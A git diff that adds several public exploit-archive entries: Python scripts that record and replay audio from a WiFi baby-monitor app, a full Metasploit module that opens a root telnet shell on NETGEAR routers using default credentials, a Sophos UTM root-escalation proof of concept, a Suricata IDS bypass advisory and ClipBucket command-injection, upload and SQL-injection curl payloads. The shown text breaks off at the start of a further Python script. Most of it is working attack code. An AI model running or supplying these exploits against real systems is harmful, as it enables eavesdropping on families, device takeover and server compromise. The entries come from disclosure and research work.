diff --git a/exploits/android/remote/44242.md b/exploits/android/remote/44242.md new file mode 100644 index 000000000..0a6414b78 --- /dev/null +++ b/exploits/android/remote/44242.md @@ -0,0 +1,166 @@ +Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite (the free version of WiFi Baby Monitor). Although the premium version offered users the ability to specify a password to be used in the pairing process, the free version offered no such function. + +Monitoring the traffic using Wireshark during the pairing process revealed: + +- The initial connection is made on port 8257 +- To start the pairing process, the same sequence is sent each time +- After the pairing process is finished, another connection is opened to port 8258, where the audio data will be transmitted +- After the connection is made to port 8258, the connection on port 8257 is kept open and used as a heartbeat for the session +- On the heartbeat connection, the client will periodically send 0x01 to the baby monitor (roughly once per second) + +## Abusing The Protocol to Record Audio + +With the pairing process reversed, it was possible to create a proof of concept which proved that it was possible to deploy a small program into a compromised network which would eavesdrop on a baby monitor and allow for an attacker to play the recording back at a later date at their discretion. + +The [very hacky] proof of concept code can be found below: + +``` +import socket +import sys +import time + +if len(sys.argv) < 2: + print "Usage: python {file} target_ip [port]".format(file = sys.argv[0]) + exit(1) + +target = sys.argv[1] +port = 8257 + +if len(sys.argv) == 3: + port = int(sys.argv[2]) + +s = socket.socket() +s.connect((target, port)) +s.send('\x01') +s.send('\x02\x64\x00\x00\x00\x13\x2b\x52\x65\x63\x65\x69\x76\x65\x72\x53' + + '\x74\x61\x72\x74\x5f\x32\x2e\x30\x32\x00\x00\x00\x00\x03\x23\x31' + + '\x30\x00\x00\x00\x00\x03\x23\x32\x30\x00\x00\x00\x00\x03\x23\x32' + + '\x31\x00\x00\x00\x00\x03\x23\x32\x32\x00\x00\x00\x00\x03\x23\x32' + + '\x33') + +heartbeat_dump = open('dump.heartbeat.bin', 'wb') +data_dump = open('dump.data.bin', 'wb') + +has_data_socket = False +data_socket = socket.socket() +delta = 0 + +while True: + time.sleep(1) + data = s.recv(2048) + if data is not None: + heartbeat_dump.write(data) + print '[*] Received {bytes} bytes on heartbeat socket'.format(bytes = len(data)) + s.send('\x01') + + if has_data_socket: + data = data_socket.recv(2048) + if data is not None: + data_dump.write(data) + print '[*] Received {bytes} bytes on data socket'.format(bytes = len(data)) + data_socket.send('\x01') + else: + print '[*] Establishing data connection' + data_socket.connect((target, 8258)) + data_socket.send('\x01') + data_socket.send('\x02\x64\x00\x00\x00\x07\x33\x5f\x5f\x30\x30\x30\x30') + has_data_socket = True + print '[*] Established data connection' + + delta += 1 + +heartbeat_dump.close +data_dump.close +``` + +This script establishes a connection to the baby monitor and begins to dump out the data from port 8257 to dump.heartbeat.bin and the data from port 8258 to dump.data.bin. + +Replaying the Recordings +In order to replay the recordings made by the proof of concept, I created a second script which would act as a baby monitor and replay the data back to a client; which allows for replay via the original application: + +``` +import socket +import sys +import time + +s = socket.socket() +s.bind(('0.0.0.0', 8257)) +s.listen(5) +print '[*] Heartbeat socket listening on port 8257' + +data_socket = socket.socket() +data_socket.bind(('0.0.0.0', 8258)) +data_socket.listen(5) +print '[*] Data socket listening on port 8258' + +data = '' +with open('dump.heartbeat.bin', 'r') as replay_file: + data = replay_file.read() + +wav_data = '' +with open('dump.data.bin', 'r') as wav_file: + wav_data = wav_file.read() + +c, addr = s.accept() +print '[*] Connection from {client}'.format(client = addr) +c.send(data) + +data_connection, addr = data_socket.accept() +print '[*] Data connection from {client}'.format(client = addr) +data_connection.send(wav_data) + +buf_start = 0 +buf_end = wav_data.find('\x00\x00\x00\x01', 1) +buf = wav_data[buf_start:buf_end] + +while buf is not None: + c.send('\x01') + print '[*] Sending {bytes} bytes'.format(bytes = len(buf)) + data_connection.send(buf) + time.sleep(0.1) + + if buf_end == -1 or buf_start == -1: + buf = None + else: + buf_start = buf_end + buf_end = wav_data.find('\x00\x00\x00\x01', buf_end + 1) + if buf_end == -1: + buf = wav_data[buf_start:] + else: + buf = wav_data[buf_start:buf_end] + +data_connection.close() +c.close() +print '[*] Connection closed' +``` + +A demonstration of the replay script accepting a connection from a client and replaying a recording can be seen below: + +https://vimeo.com/258487598 + +## Solution + +When notified, the vendor took the [respectably] responsible approach and made available to the free version the security features that were previously exclusive to the premium version. + +To prevent this attack, users can simply update to the latest version of the application (v2.02.2, at the time of writing this). + +## CVE-ID + +CVE-2018-7661 + +## CVSS Score + +CVSS Base Score: 5.9 +Impact Subscore: 4.2 +Exploitability Subscore: 1.6 +CVSS Temporal Score: 5.3 +Overall CVSS Score: 5.3 +Vector: AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C + +## Disclosure Timeline + +2018-02-11: Initial contact with vendor to make them aware of the attack vector +2018-02-12: Vendor acknowledged the issue and provided keys to test the premium version to verify the encryption and password protection would resolve the issue +2018-02-15: Confirmation sent to vendor to let them know the proposed solution should nullify the attack +2018-02-16: Vendor begins roll-out process for the new update +2018-02-22: Roll-out process completed and version 2.02.2 made available to the public \ No newline at end of file diff --git a/exploits/hardware/remote/44245.rb b/exploits/hardware/remote/44245.rb new file mode 100755 index 000000000..24f6dede7 --- /dev/null +++ b/exploits/hardware/remote/44245.rb @@ -0,0 +1,242 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Capture + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NETGEAR TelnetEnable', + 'Description' => %q{ + This module sends a magic packet to a NETGEAR device to enable telnetd. + Upon successful connect, a root shell should be presented to the user. + }, + 'Author' => [ + 'Paul Gebheim', # Python PoC (TCP) + 'insanid', # Python PoC (UDP) + 'wvu', # Metasploit module + ], + 'References' => [ + ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'], + ['URL', 'https://github.com/cyanitol/netgear-telenetenable'], + ['URL', 'https://github.com/insanid/netgear-telenetenable'] + ], + 'DisclosureDate' => 'Oct 30 2009', # Python PoC (TCP) + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Targets' => [ + ['Automatic (detect TCP or UDP)', + proto: :auto + ], + ['TCP (typically older devices)', + proto: :tcp, + username: 'Gearguy', + password: 'Geardog' + ], + ['UDP (typically newer devices)', + proto: :udp, + username: 'admin', + password: 'password' + ] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + Opt::RPORT(23), + OptString.new('MAC', [false, 'MAC address of device']), + OptString.new('USERNAME', [false, 'Username on device']), + OptString.new('PASSWORD', [false, 'Password on device']) + ]) + end + + def check + # Run through protocol detection + detect_proto + + # This is a gamble, but it's the closest we can get + if @proto == :tcp + CheckCode::Detected + else + CheckCode::Unknown + end + end + + def exploit + # Try to do the exploit unless telnetd is detected + @do_exploit = true + + # Detect TCP or UDP and presence of telnetd + @proto = target[:proto] + detect_proto if @proto == :auto + + # Use supplied or ARP-cached MAC address + configure_mac if @do_exploit + + # Use supplied or default creds + configure_creds if @do_exploit + + # Shell it + exploit_telnetenabled if @do_exploit + connect_telnetd + end + + def detect_proto + begin + connect + + res = begin + sock.get_once || '' + rescue EOFError + '' + end + + # telnetenabled returns no data, unlike telnetd + if res.length == 0 + print_good('Detected telnetenabled on TCP') + else + print_good('Detected telnetd on TCP') + @do_exploit = false + end + + @proto = :tcp + # It's UDP... and we may not get an ICMP error... + rescue Rex::ConnectionError + print_good('Detected telnetenabled on UDP') + @proto = :udp + ensure + disconnect + end + end + + def configure_mac + @mac = datastore['MAC'] + + return if @mac + + print_status('Attempting to discover MAC address via ARP') + + begin + open_pcap + @mac = lookup_eth(rhost).first + rescue RuntimeError + fail_with(Failure::BadConfig, 'Superuser access required') + ensure + close_pcap + end + + if @mac + print_good("Found MAC address #{@mac}") + else + fail_with(Failure::Unknown, 'Could not find MAC address') + end + end + + def configure_creds + @username = datastore['USERNAME'] || target[:username] + @password = datastore['PASSWORD'] || target[:password] + + # Try to use default creds if no creds were found + unless @username && @password + tgt = targets.find { |t| t[:proto] == @proto } + @username = tgt[:username] + @password = tgt[:password] + end + + print_good("Using creds #{@username}:#{@password}") + end + + def exploit_telnetenabled + print_status('Generating magic packet') + payload = magic_packet(@mac, @username, @password) + + begin + print_status("Connecting to telnetenabled via #{@proto.upcase}") + @proto == :tcp ? connect : connect_udp + print_status('Sending magic packet') + @proto == :tcp ? sock.put(payload) : udp_sock.put(payload) + rescue Rex::ConnectionError + fail_with(Failure::Disconnected, 'Something happened mid-connection!') + ensure + print_status('Disconnecting from telnetenabled') + @proto == :tcp ? disconnect : disconnect_udp + end + + # Wait a couple seconds for telnetd to come up + print_status('Waiting for telnetd') + sleep(2) + end + + def connect_telnetd + print_status('Connecting to telnetd') + connect + handler(sock) + end + + # NOTE: This is almost a verbatim copy of the Python PoC + def magic_packet(mac, username, password) + mac = mac.gsub(/[:-]/, '').upcase + + if mac.length != 12 + fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -') + end + just_mac = mac.ljust(0x10, "\x00") + + if username.length > 0x10 + fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes') + end + just_username = username.ljust(0x10, "\x00") + + if @proto == :tcp + if password.length > 0x10 + fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes') + end + just_password = password.ljust(0x10, "\x00") + elsif @proto == :udp + # Thanks to Roberto Frenna for the reserved field analysis + if password.length > 0x21 + fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes') + end + just_password = password.ljust(0x21, "\x00") + end + + cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00") + md5_key = Rex::Text.md5_raw(cleartext) + + payload = byte_swap((md5_key + cleartext).ljust(0x80, "\x00")) + + secret_key = 'AMBIT_TELNET_ENABLE+' + password + + byte_swap(blowfish_encrypt(secret_key, payload)) + end + + def blowfish_encrypt(secret_key, payload) + cipher = OpenSSL::Cipher.new('bf-ecb').encrypt + + cipher.padding = 0 + cipher.key_len = secret_key.length + cipher.key = secret_key + + cipher.update(payload) + cipher.final + end + + def byte_swap(data) + data.unpack('N*').pack('V*') + end + +end \ No newline at end of file diff --git a/exploits/linux/local/44246.txt b/exploits/linux/local/44246.txt new file mode 100644 index 000000000..4b8f07a3c --- /dev/null +++ b/exploits/linux/local/44246.txt @@ -0,0 +1,183 @@ +KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service + +Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service +Advisory ID: KL-001-2018-007 +Publication Date: 2018.03.02 +Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt + + +1. Vulnerability Details + + Affected Vendor: Sophos + Affected Product: UTM 9 + Affected Version: 9.410 + Platform: Embedded Linux + CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation) + Impact: Privilege Escalation + Attack vector: SSH + +2. Vulnerability Description + + The attacker must know the password for the loginuser + account. The confd client is not available to the loginuser + account. However, the running service is accessible over + a network port on the loopback interface. By replaying the + network traffic required to obtain a SID from this service it + is possible to escalate privileges to root. + +3. Technical Description + + 1. Obtain the a privileged session token + + $ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7 + loginuser@1.3.3.7's password: + $ python kl-loginuser-confd-priv_esc.py + pojiZSqWEUAUDNIQtSop + + 2. Using that session token, set the root password + + POST /webadmin.plx HTTP/1.1 + Host: 1.3.3.7:4444 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 + Accept: text/javascript, text/html, application/xml, text/xml, */* + Accept-Language: en-US,en;q=0.5 + X-Requested-With: XMLHttpRequest + X-Prototype-Version: 1.5.1.1 + Content-Type: application/json; charset=UTF-8 + Referer: https://1.3.3.7:4444/ + Content-Length: 422 + Cookie: SID=pojiZSqWEUAUDNIQtSop + DNT: 1 + Connection: close + + {"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1": +"loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser": +"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": +"1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false} + + HTTP/1.1 200 OK + Date: Thu, 23 Mar 2017 15:33:53 GMT + Server: Apache + Expires: Thursday, 01-Jan-1970 00:00:01 GMT + Pragma: no-cache + X-Frame-Options: SAMEORIGIN + X-Content-Type-Option: nosniff + X-XSS-Protection: 1; mode=block + Vary: Accept-Encoding + Connection: close + Content-Type: application/json; charset=utf-8 + Content-Length: 178895 + + {"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000] + + 3. Look for success message. + + "objs":[{"success":[{"text":"Shell user password(s) set successfully."}] + + 4. Profit. + + loginuser@[redacted]:/home/login > su + Password: + [redacted]:/home/login # id + uid=0(root) gid=0(root) groups=0(root),890(xorp) + +4. Mitigation and Remediation Recommendation + + The vendor has addressed this vulnerability in version + 9.508. Release notes and download instructions can be found at: + + https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released + + +5. Credit + + This vulnerability was discovered by Matt Bergin (@thatguylevel) + of KoreLogic, Inc. + +6. Disclosure Timeline + + 2017.07.21 - KoreLogic submits vulnerability details to Sophos. + 2017.07.21 - Sophos acknowledges receipt. + 2017.09.01 - 30 business days have elapsed since the vulnerability + was reported to Sophos. + 2017.09.15 - KoreLogic requests an update on the status of this and + other vulnerabilities reported to Sophos. + 2017.09.18 - Sophos informs KoreLogic that this issue will require + additional engineering and requests an extension of + the disclosure timeline. + 2017.09.25 - 45 business days have elapsed since the vulnerability + was reported to Sophos. + 2017.11.07 - 75 business days have elapsed since the vulnerability + was reported to Sophos. + 2017.12.14 - 100 business days have elapsed since the vulnerability + was reported to Sophos. + 2018.01.12 - KoreLogic requests an update from Sophos. + 2018.01.15 - Sophos informs KoreLogic that the expected release date + for the UTM 9.5 MR 6 version containing the mitigation + is the middle of February. + 2018.01.16 - 120 business days have elapsed since the vulnerability + was reported to Sophos. + 2018.02.28 - 150 business days have elapsed since the vulnerability + was reported to Sophos. + 2018.03.01 - UTM 9.508 released by Sophos. + 2018.03.02 - KoreLogic public disclosure. + +7. Proof of Concept + +from socket import socket,AF_INET,SOCK_STREAM + +class Exploit: + def __init__(self): + self.host = '127.0.0.1' + self.port = 4472 + self.connected = False + self.s = None + return None + def disconnect(self): + self.s.close() + return True + def send_trigger(self): + packet_one = +'00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex') + self.s.send(packet_one) + self.s.recv(4096) + packet_two = +'00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex') + self.s.send(packet_two) + self.s.recv(4096) + packet_three = +'0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex') + self.s.send(packet_three) + print self.s.recv(4096).strip() + return True + def connect(self): + self.s = socket(AF_INET, SOCK_STREAM) + self.s.connect((self.host,self.port)) + self.connected = True + return True + def run(self): + self.connect() + self.send_trigger() + self.disconnect() + return True + +if __name__=="__main__": + Exploit().run() + + +The contents of this advisory are copyright(c) 2018 +KoreLogic, Inc. and are licensed under a Creative Commons +Attribution Share-Alike 4.0 (United States) License: +http://creativecommons.org/licenses/by-sa/4.0/ + +KoreLogic, Inc. is a founder-owned and operated company with a +proven track record of providing security services to entities +ranging from Fortune 500 to small and mid-sized companies. We +are a highly skilled team of senior security consultants doing +by-hand security assessments for the most important networks in +the U.S. and around the world. We are also developers of various +tools and resources aimed at helping the security community. +https://www.korelogic.com/about-korelogic.html + +Our public vulnerability disclosure policy is available at: +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt \ No newline at end of file diff --git a/exploits/multiple/dos/44247.txt b/exploits/multiple/dos/44247.txt new file mode 100644 index 000000000..45413c473 --- /dev/null +++ b/exploits/multiple/dos/44247.txt @@ -0,0 +1,57 @@ +----------------------------------------------------- +Vulnerability Type: Detection Bypass +Affected Product: Suricata +Vulnerable version: <4.0.4 +CVE number: CVE-2018-6794 +Found: 25.01.2018 +By: Kirill Shipulin (@kirill_wow), Positive Technologies +Severity: Medium +------------------------------------------ + +About Suricata: +--------------- +Suricata is a high performance Network Threat Detection, IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF, its supporting vendors and the community + +Attack Description: +------------------- +If as a server side you break a normal TCP 3 way handshake packets order and inject some response data before 3whs is complete then data still will be received by the a client but some IDS engines may skip content checks on that. + +Attack scenario TCP flow scheme: +Client -> [SYN] [Seq=0 Ack= 0] -> Evil Server +Client <- [SYN, ACK] [Seq=0 Ack= 1] <- Evil Server +Client <- [PSH, ACK] [Seq=1 Ack= 1] <- Evil Server # Injection before the 3whs is completed +Client <- [FIN, ACK] [Seq=83 Ack= 1] <- Evil Server +Client -> [ACK] [Seq=1 Ack= 84] -> Evil Server +Client -> [PSH, ACK] [Seq=1 Ack= 84] -> Evil Server + +IDS signature checks for tcp stream or http response body will be skipped in the case of data injection. This attack technique requires all three packets from a malicious server to be received by a client side together before it completes 3whs. Proof of concept server was written in C to reproduce this and it works reliably in local networks. Since some network devices may affect packets transmission exploitation is not so reliable for the internet scenario. + +This attack possibly may impact other network monitoring or intrusion detection systems because is not limited to Suricata IDS: an old Snort IDS version 2.9.4 is also affected. + +Successful exploitation leads to a complete TCP-Stream response or HTTP response signatures bypass and may be used to prevent malicious payloads from network detection. + +PoС: +---- +A Working PoC server is available here: https://github.com/kirillwow/ids_bypass +There is also a traffic capture of this data injection technique. + +Timeline Summary: +----------------- +2018-01-25: Issue submitted to the bug tracker. +2018-01-30: Patch ready. +2018-02-14: Suricata 4.0.4 containing the fix has been released. + +References: +----------- +CVE-2018-6794 +https://redmine.openinfosecfoundation.org/issues/2427 + +Contacts: +--------- +Twitter: https://twitter.com/AttackDetection +Twitter: https://twitter.com/kirill_wow +Telegram: https://t.me/kirill_wow + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44247.zip \ No newline at end of file diff --git a/exploits/php/webapps/44250.txt b/exploits/php/webapps/44250.txt new file mode 100644 index 000000000..28d80463a --- /dev/null +++ b/exploits/php/webapps/44250.txt @@ -0,0 +1,245 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180227-0 > +======================================================================= + title: OS command injection, arbitrary file upload & SQL injection + product: ClipBucket + vulnerable version: <4.0.0 - Release 4902 + fixed version: 4.0.0 - Release 4902 + CVE number: - + impact: critical + homepage: http://clipbucket.com/ + found: 2017-09-06 + by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) + Wan Ikram (Office Kuala Lumpur) + Fikri Fadzil (Office Kuala Lumpur) + Jasveer Singh (Office Kuala Lumpur) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Bangkok - Berlin - Linz - Luxembourg - Montreal + Moscow - Munich - Kuala Lumpur - Singapore + Vienna (HQ) - Vilnius - Zurich + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"ClipBucket is a free and open source software which helps us to create a +complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu +in few minutes of setup. It was first created in 2007 by Arslan Hassan and his +team of developers. ClipBucket was developed as a YouTube clone but has been +upgraded with advanced features and enhancements. It uses FFMPEG for video +conversion and thumbs generation which is the most widely used application so, +users can stream it straight away using the Video JS and HTML 5 Players." + +Source: https://clipbucket.com/about + + +Business recommendation: +------------------------ +By exploiting the vulnerabilities documented in this advisory, an attacker can +fully compromise the web server which has ClipBucket installed. Potentially +sensitive data might get exposed through this attack. + +Users are advised to immediately install the patched version provided by the +vendor. + + +Vulnerability overview/description: +----------------------------------- +1. Unauthenticated OS Command Injection +Any OS commands can be injected by an unauthenticated attacker. This is a serious +vulnerability as the chances for the system to be fully compromised is very +high. This same vulnerability can also be exploited by authenticated attackers +with normal user privileges. + +2. Unauthenticated Arbitrary File Upload +A malicious file can be uploaded into the webserver by an unauthenticated +attacker. It is possible for an attacker to upload a script to issue operating +system commands. This same vulnerability can also be exploited by an +authenticated attacker with normal user privileges. + +3. Unauthenticated Blind SQL Injection +The identified SQL injection vulnerabilities enable an attacker to execute +arbitrary SQL commands on the underlying MySQL server. + + +Proof of concept: +----------------- +1. Unauthenticated OS Command Injection +Without having to authenticate, an attacker can exploit this vulnerability +by manipulating the "file_name" parameter during the file upload in the script +/api/file_uploader.php: + + $ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>" +http://$HOST/api/file_uploader.php + + +Alternatively, this vulnerability can also be exploited by authenticated basic +privileged users with the following payload by exploiting the same issue in +/actions/file_downloader.php: + +$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc +|| <>" "http://$HOST/actions/file_downloader.php" + + +2. Unauthenticated Arbitrary File Upload +Below is the cURL request to upload arbitrary files to the webserver with no +authentication required. + +$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" +"http://$HOST/actions/beats_uploader.php" + +$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" +"http://$HOST/actions/photo_uploader.php" + +Furthermore, this vulnerability is also available to authenticated users with +basic privileges: + +$ curl --cookie "[--SNIP--]" -F +"coverPhoto=@valid-image-with-appended-phpcode.php" +"http://$HOST/edit_account.php?mode=avatar_bg" + + +3. Unauthenticated Blind SQL Injection +The following parameters have been identified to be vulnerable against +unauthenticated blind SQL injection. + +URL : http://$HOST/actions/vote_channel.php +METHOD : POST +PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand()) + +The source code excerpt below shows the vulnerable code +VULN. FILE : /actions/vote_channel.php +VULN. CODE : +[...] +$vote = $_POST["vote"]; +$userid = $_POST["channelId"]; +//if($userquery->login_check('',true)){ +if($vote == "yes"){ + $query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1 +WHERE userid = {$userid}"; +}else{ + //$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid = +{$userid}"; + $sel = "Select userid,username,likes From ".tbl("users")." WHERE userid = +{$userid}"; + $result = $db->Execute($sel); + foreach ($result as $row ) + $current_likes = $row['likes']; + $decremented_like = $current_likes-1; + $query = "Update ".tbl("users")." Set likes = $decremented_like Where userid += $userid"; +} +[...] + +URL : http://$HOST/ajax/commonAjax.php +METHOD : POST +PAYLOAD : mode=emailExists&email=1' or '1'='1 + +The source code excerpt below shows the vulnerable code +VULN. FILE : /ajax/commonAjax.php +VULN. CODE : +[...] +$email = $_POST['email']; +$check = $db->select(tbl('users'),"email"," email='$email'"); +if (!$check) { + echo "NO"; +} +[...] + +URL : http://$HOST/ajax/commonAjax.php +METHOD : POST +PAYLOAD : mode=userExists&username=1' or '1'='1 + +The source code excerpt below shows the vulnerable code +VULN. FILE : /ajax/commonAjax.php +VULN. CODE : +[...] +$username = $_POST['username']; +$check = $db->select(tbl('users'),"username"," username='$username'"); +if (!$check) { + echo "NO"; +} +[...] + + +Vulnerable / tested versions: +----------------------------- +Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were +the latest at the time the security vulnerabilities were discovered. + + +Vendor contact timeline: +------------------------ +2017-10-17: Contacting vendor through email. +2017-10-18: Vendor asking for additional details. +2017-10-19: Replied to vendor. +2017-10-26: Request update from vendor, no response. +2017-11-09: Request update from vendor. +2017-11-09: Vendor response with security patches. +2017-11-10: Notified vendor the security patches don't fix the reported issues +2017-11-30: Request update from vendor. +2017-11-30: Vendor requesting for support via Skype +2017-12-07: Response to vendor. +2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again +2018-01-22: Vendor provides latest patches, scheduled for future release +2018-01-26: Verified that the patches don't fully mitigate all issues. +2018-01-29: Request update from vendor, no response. +2018-02-06: Request update from vendor, no response. +2018-02-08: Informing vendor of public release date +2018-02-08: Vendor: Stable v4.0 including security fixes will be released in + two weeks; postponing once again for two weeks +2018-02-23: Request update from vendor. +2018-02-26: Vendor publishes v4.0 +2018-02-27: Public release of security advisory + + + +Solution: +--------- +The vendor provided the following patched version: +https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip + + +Workaround: +----------- +None + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Bangkok - Berlin - Linz - Luxembourg - Montreal +Moscow - Munich - Kuala Lumpur - Singapore +Vienna (HQ) - Vilnius - Zurich + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult \ No newline at end of file diff --git a/exploits/php/webapps/44252.py b/exploits/php/webapps/44252.py new file mode 100755 index 000000000..f7645b129 --- /dev/null +++ b/exploits/php/webapps/44252.py @@ -0,0 +1,265 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- +''' + + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. +''' +try: + import urllib2 +except: + print "$ pip2 install urllib2" +try: + import argparse +except: + print "$ pip2 install argparse" +try: + import BeautifulSoup +except: + print "$ pip2 install BeautifulSoup" +try: + import urlparse +except: + print "$ pip2 install urlparse" +try: + import requests +except: + print "$ pip2 install requests" +try: + import threading +except: + print "$ pip2 install threading" +import time, sys , os +global Animation, slowprint, fastprint +os.system('clear') + +class Lab_Collors(): + vermelho = '\033[31m' + verde = '\033[32m' + azul = '\033[34m' + ciano = '\033[36m' + purple = '\033[35m' + amarelo = '\033[33m' + preto = '\033[30m' + branco = '\033[37m' + original = '\033[0;0m' + reverso = '\033[2m' + default = '\033[0m' + +def slowprint(s): + for c in s + '\n': + sys.stdout.write(c) + sys.stdout.flush() # defeat buffering + time.sleep(8./90) +#time.sleep(10./90) + +def fastprint(s): + for c in s + '\n': + sys.stdout.write(c) + sys.stdout.flush() # defeat buffering + time.sleep(1./50) + +def Animation(String, color): + animation = "|/-\\" + for i in range(15): + time.sleep(0.1) + sys.stdout.write("\r" + "[" + animation[i % len(animation)] + "]" + color + String) + sys.stdout.flush() + 